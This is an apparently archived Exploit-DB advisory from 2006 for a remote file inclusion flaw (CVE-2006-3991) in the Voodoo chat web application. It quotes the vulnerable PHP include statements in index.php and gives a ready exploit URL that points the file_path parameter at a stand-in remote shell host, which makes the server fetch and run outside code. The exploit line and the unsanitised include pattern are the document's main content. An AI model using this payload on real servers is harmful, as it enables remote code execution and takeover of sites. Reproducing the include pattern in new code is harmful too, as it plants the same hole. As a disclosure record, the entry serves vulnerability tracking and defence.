Voodoo chat <= 1.0RC1b file_path Remote File Inclusion Vulnerability

2006-08-01T00:00:00
ID EDB-ID:2102
Type exploitdb
Reporter SHiKaA
Modified 2006-08-01T00:00:00

Description

Voodoo chat <= 1.0RC1b (file_path) Remote File Inclusion Vulnerability. CVE-2006-3991. Webapps exploit for php platform

                                        
                                            #=================================================================
#Voodoo chat 1.0RC1b &lt;= (file_path) Remote File Inclusion Exploit
#================================================================
#                                                                |
#Critical Level : Dangerous                                      |
#                                                                |
#Venedor site : http://vochat.com/                               |
#                                                                |
#Version : 1.0                                                   |
#                                                                |
#=================================================================
#Bug in : index.php
#
#Vlu Code :
#--------------------------------
#//here it can fails, i don't care. will be used default system language
#
#   else include_once($file_path."languages/".$language.".php");
#
#   include($file_path."designes/".$design."/index.php");
#?&gt;
#=================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/index.php?file_path=http://SHELLURL.COM?
#
#===============================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#GreetZ : Bl@Ck^B1rd Semsemmasr Black_Scorpion Medo_Ye7ya Kambaa  NANA Kashtawa
#Skiing Gendiaaa Saw AzIZa SnIpEr_Sa Masry OSA FEGLA 3amer
=================================================================

# milw0rm.com [2006-08-01]